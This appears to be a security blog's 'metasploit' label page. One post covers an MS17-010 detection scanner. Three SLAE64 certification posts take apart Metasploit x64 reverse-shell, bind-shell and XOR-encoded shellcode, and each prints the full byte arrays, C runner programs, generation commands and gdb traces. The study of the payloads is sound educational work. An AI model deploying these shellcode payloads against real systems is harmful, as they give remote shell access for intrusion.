Showing posts with label metasploit. Show all posts

Tuesday, April 18, 2017

MS17-010 (SMB RCE) Metasploit Scanner Detection Module

Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen. Microsoft's official response says these exploits were fixed up in MS17-010, released in mid-March.

Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu of Rapid7 (whom I coincidentally met in person the day of the leak) added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect whether the patch is missing.

Module Information Page
https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

Module Source Code
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).
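The decision logic described above can be sketched in a few lines. This is only an illustration in Python, not the module's Ruby source: the helper name `classify_peek_status` is hypothetical, while the three NTSTATUS values are the standard ones.

```python
# Standard NTSTATUS codes for the three replies mentioned above.
STATUS_INVALID_HANDLE = 0xC0000008
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205


def classify_peek_status(status: int) -> str:
    """Map the PeekNamedPipe reply status to a verdict (hypothetical helper)."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"   # the MS17-010 patch is missing
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "patched"      # Win10 / other Windows versions after the patch
    return "unknown"          # patch level could not be determined


print(classify_peek_status(STATUS_INSUFF_SERVER_RESOURCES))
```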

IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be run as an unauthenticated scan, as it can log on as the user "\" and connect to IPC$.

This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

Saturday, December 20, 2014

A Look at the linux/x64/shell_reverse_tcp Metasploit Payload

After I finished micro optimizing my reverse TCP shellcode, I remembered that Metasploit offers one. The one msfpayload generated weighs in at 74 bytes. My payload is 77 bytes; however, mine doesn't contain any null-bytes. Metasploit's will always contain nulls, even if your IP and port do not.

Even though I was sad to see it contained null-bytes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 C
 * linux/x64/shell_reverse_tcp - 74 bytes

I threw this into a C file.

unsigned char sc[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

int main(void)
{
    (*(void(*)()) sc)();
}
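
The size and null-byte claims are easy to double check outside of a debugger. A minimal sketch in Python, using the same bytes as the C array above (the variable names are just for illustration):

```python
# Same 74 bytes as the C array, written as hex for convenience.
sc = bytes.fromhex(
    "6a2958996a025f6a015e0f05489748"
    "b90200115c7f000001514889e66a10"
    "5a6a2a580f056a035e48ffce6a2158"
    "0f0575f66a3b589948bb2f62696e2f"
    "736800534889e752574889e60f05"
)

# Offsets of every zero byte in the payload.
null_offsets = [i for i, b in enumerate(sc) if b == 0]
print(len(sc), null_offsets)
```

The first three offsets fall inside the sockaddr constant and the last one is the terminator of the "/bin/sh" string.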


I compiled it: gcc -m64 -z execstack msfreverse.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

As in the bind shell version, they were able to fit their register setup and first syscall into 12 bytes, whereas mine took 13.  Here again is a high level look at how they did it:

push   0x29
pop    rax
cdq
push   0x2
pop    rdi
push   0x1
pop    rsi
syscall
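
The 12-byte figure can be tallied from the encodings themselves. A quick sketch in Python: the hex values are the first 12 bytes of the payload array, and the table layout is only for illustration.

```python
# (mnemonic, machine code) pairs for the socket() setup.
prologue = [
    ("push 0x29", "6a29"),  # syscall number 41 = socket
    ("pop rax",   "58"),
    ("cdq",       "99"),    # sign-extends EAX into EDX, so EDX becomes 0
    ("push 0x2",  "6a02"),  # AF_INET
    ("pop rdi",   "5f"),
    ("push 0x1",  "6a01"),  # SOCK_STREAM
    ("pop rsi",   "5e"),
    ("syscall",   "0f05"),
]

encoded = "".join(code for _, code in prologue)
total = len(bytes.fromhex(encoded))
print(total)
```

Each push imm8 / pop reg pair costs 3 bytes, which is what makes this shorter than clearing and then loading the registers separately.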

Next we come across an area with null-bytes. Since I used 127.0.0.1 for the address, there are null-bytes. I got around this in my own shellcode by subtracting a mask, and adding it back when the shellcode is run.
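
The exact mask is not shown in this post, so the following is only a sketch of the general idea in Python: embed the value minus a mask (both free of zero bytes) and add the mask back at run time. The helper names and the choice of repeated-byte masks are assumptions made for illustration.

```python
MOD = 1 << 64  # 64-bit register arithmetic wraps modulo 2**64


def has_null(value: int) -> bool:
    """True if the 8-byte little-endian encoding contains a zero byte."""
    return 0 in value.to_bytes(8, "little")


def find_mask(value: int) -> int:
    """Return a repeated-byte mask m such that (value - m) is null-free."""
    for b in range(1, 256):
        mask = int.from_bytes(bytes([b]) * 8, "little")
        if not has_null((value - mask) % MOD):
            return mask
    raise ValueError("no repeated-byte mask works for this value")


sockaddr = 0x0100007F5C110002       # AF_INET, port 4444, 127.0.0.1
mask = find_mask(sockaddr)
stored = (sockaddr - mask) % MOD    # constant that would sit in the shellcode
restored = (stored + mask) % MOD    # what an add at run time rebuilds
print(hex(mask), hex(stored))
```

The cost is a second 64-bit constant plus an add instruction, which is part of why a null-free version ends up larger.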

One thing they did that shrinks the code considerably is load the first eight bytes of the struct sockaddr (family, port, and address) with a single mov instruction.

0x000000000060088e in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088e <sc+14>:    movabs $0x100007f5c110002,%rcx
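
To see where that immediate comes from, the first eight bytes of the struct can be rebuilt by hand. A minimal sketch in Python using the LHOST and LPORT from the msfpayload command above:

```python
import socket
import struct

# struct sockaddr_in begins with sin_family (host byte order), followed by
# sin_port and sin_addr (both network byte order): 8 bytes in total.
raw = (
    struct.pack("<H", socket.AF_INET)   # 02 00
    + struct.pack(">H", 4444)           # 11 5c
    + socket.inet_aton("127.0.0.1")     # 7f 00 00 01
)

# Read as a little-endian qword, this is the movabs operand.
imm = int.from_bytes(raw, "little")
print(hex(imm))
```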

It looks like they actually end up with some pollution in their stack when the syscall is made.

(gdb) x/4xw $rsi
0x7fffffffe330:    0x5c110002    0x0100007f    0x004004bc    0x00000000

We can compare this to my version, which cleans the stack first.
(gdb) x/4xw $rsi
0x7fffffffe328:    0x5c110002    0x0100007f    0x00000000    0x00000000

I ran both programs through strace, and got identical syscalls.

connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16)

So I consulted the man page. These trailing bytes appear to be the sin_zero padding of struct sockaddr_in, which connect() did not seem to care about here, so there may be a way to shrink my own shellcode at this point. I think I would be able to save 1 byte by not pushing and clearing this out.
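
The two gdb dumps can be split into fields to make the difference explicit. A small sketch in Python: the helper name `parse_dump` is hypothetical, and the words are copied from the `x/4xw` output above.

```python
import socket
import struct


def parse_dump(words):
    """Rebuild the 16 bytes shown by x/4xw and split them like sockaddr_in."""
    raw = struct.pack("<4I", *words)
    (family,) = struct.unpack_from("<H", raw, 0)   # host byte order
    (port,) = struct.unpack_from(">H", raw, 2)     # network byte order
    addr = socket.inet_ntoa(raw[4:8])
    sin_zero = raw[8:16]                           # padding bytes
    return family, port, addr, sin_zero


msf = parse_dump([0x5C110002, 0x0100007F, 0x004004BC, 0x00000000])
mine = parse_dump([0x5C110002, 0x0100007F, 0x00000000, 0x00000000])
print(msf)
print(mine)
```

Only the padding differs: Metasploit's copy still holds what looks like a leftover code address, while the family, port, and address are identical.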

The rest of the code is pretty standard for a reverse shell.  There's another null-byte when the "/bin/sh" string is put on the stack.

So just by looking at Metasploit's code I found at least two places I can further shrink my own code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

A Look at the linux/x64/shell_bind_tcp Metasploit Payload

After I finished micro optimizing my bind TCP port shellcode, I remembered that Metasploit offers one. The one msfpayload generated weighs in at 86 bytes, and the payload always contains null-bytes, even if your port does not have one.  Even though the version I created was already down to 81 bytes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_bind_tcp LPORT=4444 C
 * linux/x64/shell_bind_tcp - 86 bytes

I threw this into a C file.

unsigned char sc[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

int main(void)
{
    (*(void(*)()) sc)();
}


I compiled it: gcc -m64 -z execstack msfbind.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

I discovered they were able to shrink their register fixing and first syscall into 12 bytes, whereas mine was 13.  Here is a high level look at what they did to accomplish this:

push   0x29
pop    rax
cdq
push   0x2
pop    rdi
push   0x1
pop    rsi
syscall

You can compare that with my version, which uses xor esi, esi and mul esi to clear three registers.  Here, cdq clears out the pollution in RDX instead, and the remaining values are pushed as immediates and popped directly into the registers. In a future release of my own shellcode I would make this change.

Next though, we come across one of the first instances of a null-byte.  It is part of the struct sockaddr that is used, where the port and address family are specified.

0x000000000060088f in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088f <sc+15>:    movl   $0x5c110002,(%rsp)
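
This is why the null shows up no matter which port is chosen: the address family is a 16-bit field holding the value 2, so its high byte is always zero. A short sketch in Python (the helper name `bind_immediate` is hypothetical):

```python
import socket
import struct


def bind_immediate(port: int) -> bytes:
    """First 4 bytes of sockaddr_in: 16-bit family, then port in network order."""
    return struct.pack("<H", socket.AF_INET) + struct.pack(">H", port)


for port in (4444, 0x1234, 0xFFFF):
    imm = bind_immediate(port)
    # The second byte is the high half of sin_family and is always zero.
    print(port, imm.hex(), imm[1] == 0)
```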

When I was writing my own shellcode, I had to make a sacrifice. I probably could have shaved off even more bytes if I hadn't made the PORT configurable.  That requirement may be the reason I went about things differently and zeroed out that area of the struct by pushing a zeroed register twice. Metasploit's approach is definitely fewer bytes, but of course it contains the null.

The next parts of this shellcode are all pretty standard.  I didn't see too much more I could do in terms of shrinkage, and my own execution was very similar to this payload's.

I did want to point out another area though where the null-byte is used, as the terminator for the "/bin/sh" string. I got around this by first pushing a 0 register on the stack, and then naming the string "//bin/sh" to fill in the extra byte.

(gdb) x/i $rip
=> 0x6008c1 <sc+65>:    movabs $0x68732f6e69622f,%rbx
(gdb) x/3x $rip
0x6008c1 <sc+65>:    0x622fbb48    0x732f6e69    0x48530068
(gdb) .
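
The two ways of laying out the string can be compared as 64-bit immediates. A minimal sketch in Python; the doubled slash works because repeated slashes in a path are treated as one.

```python
def as_qword(s: bytes) -> int:
    """Interpret 8 bytes the way a little-endian 64-bit immediate stores them."""
    if len(s) != 8:
        raise ValueError("expected exactly 8 bytes")
    return int.from_bytes(s, "little")


msf = as_qword(b"/bin/sh\x00")   # 7 characters plus the terminator
alt = as_qword(b"//bin/sh")      # 8 characters, terminator pushed separately
print(hex(msf), hex(alt))
```

The first value is the movabs operand seen in gdb, with the terminator hiding in its top byte; the second has no zero byte at all.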

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

A Look at the x64/xor Metasploit Encoder

After I finished micro optimizing my reverse TCP shellcode, I remembered that Metasploit offers one. The one msfpayload generated weighs in at 74 bytes. That would seem better than my 77 byte shellcode, except it comes with a price. The payload always contains null-bytes, even if your IP does not have .0's in it. This means you won't have as much luck exploiting string buffers as you would with a completely null-free version.

I found that to generate a null-free reverse TCP payload with Metasploit I had to use the encoder, and there only appears to be a single encoder explicitly for x64. The final payload size is 119 bytes.

root@kali:~/.ssh# msfpayload linux/x64/shell_reverse_tcp LHOST=10.2.100.15 LPORT=4444 R | msfencode -t c -e x64/xor -b '\x00'
[*] x64/xor succeeded with size 119 (iteration=1)

I threw this into a C file.

unsigned char sc[] =
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x64\x8b\x0a\x55\x36\x0b\x54\xa5\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x0e\xa2\x52\xcc\x5c\x09"
"\x0b\xcf\x65\xd5\x05\x50\x7e\x9c\x1c\x1c\x66\x8b\x1b\x09\x3c"
"\x09\x30\xaa\x35\xc3\x83\xb3\x5c\x1b\x0e\xcf\x4e\xd3\x05\x50"
"\x5c\x08\x0a\xed\x9b\x45\x60\x74\x6e\x04\x51\xd0\x92\xe1\x31"
"\x0d\xaf\x43\xef\x8a\x06\xe2\x64\x7a\x45\x63\x54\xf6\x2c\x02"
"\xed\x07\x61\x43\xdd\x43\x6b\x8e\x0a\x55\x36\x0b\x54\xa5";

int main(void)
{
    (*(void(*)()) sc)();
}


I compiled it: gcc -m64 -z execstack msfencoded.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

This is where the call into our shellcode begins. It starts out by setting RCX to 0xa. It then does RIP-relative addressing to load into RAX where it needs to start decoding from.

0x000000000060088a in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x60088a <sc+10>:    lea    -0x11(%rip),%rax        # 0x600880 <sc>
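
Both setup instructions rely on 64-bit wraparound, which is easy to check by hand. A small sketch in Python using the addresses from the gdb output above:

```python
MOD = 1 << 64                       # registers wrap modulo 2**64

# xor rcx, rcx ; sub rcx, 0xfffffffffffffff6
rcx = (0 - 0xFFFFFFFFFFFFFFF6) % MOD

# lea rax, [rip - 0x11]: RIP already points past the 7-byte LEA at sc+10.
sc_addr = 0x600880
lea_addr, lea_len = sc_addr + 10, 7
rax = (lea_addr + lea_len - 0x11) % MOD

print(rcx, hex(rax))
```

RCX ends up as the number of qwords to decode, and RAX as the address of the start of the shellcode.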

Next, 0xa5540b36550a8b64 is moved into RBX. This key is XORed into the qword at [RAX + 0x27], which is the first eight bytes after the decoder stub.

0x000000000060089b in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0xa5540b36550a8b64
2: /x $rax = 0x600880
1: x/i $rip
=> 0x60089b <sc+27>:    xor    %rbx,0x27(%rax)

Eight bytes are then added to RAX (the code subtracts -8), and the loop instruction jumps back to the XOR until RCX reaches zero.  Once the loop finishes, execution falls straight through into the now-decoded payload.

This is clearly a very simple encoder.  Here's what the full code looks like:

_start:
    xor rcx, rcx
    sub rcx, 0xfffffffffffffff6
    lea rax, [rip + 0xffffffffffffffef]
    movabs rbx, 0xa5540b36550a8b64

decode:
    xor qword ptr [rax+0x27], rbx
    sub rax, 0xfffffffffffffff8
    loop decode

data:
    db 0x...
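
The decoder is simple enough to emulate offline. The sketch below is a Python re-implementation of the loop, not Metasploit's own code; it runs over the same 119 bytes as the C array above.

```python
import struct

# Same 119 bytes as the C array: 39-byte decoder stub + 80 encoded bytes.
sc = bytes.fromhex(
    "4831c94881e9f6ffffff488d05efff"
    "ffff48bb648b0a55360b54a5483158"
    "27482df8ffffffe2f40ea252cc5c09"
    "0bcf65d505507e9c1c1c668b1b093c"
    "0930aa35c383b35c1b0ecf4ed30550"
    "5c080aed9b4560746e0451d092e131"
    "0daf43ef8a06e2647a456354f62c02"
    "ed076143dd436b8e0a55360b54a5"
)
KEY = 0xA5540B36550A8B64
START, COUNT = 0x27, 10             # the [rax+0x27] offset and initial RCX


def decode(blob: bytes) -> bytes:
    """XOR COUNT little-endian qwords with KEY, starting at offset START."""
    out = bytearray(blob)
    for i in range(COUNT):
        off = START + 8 * i
        (q,) = struct.unpack_from("<Q", out, off)
        struct.pack_into("<Q", out, off, q ^ KEY)
    return bytes(out[START:])


payload = decode(sc)
print(payload.hex())
```

The result is the plain 74-byte reverse shell for 10.2.100.15:4444 followed by six zero bytes of padding, which is why the tail of the encoded array repeats part of the key.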

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360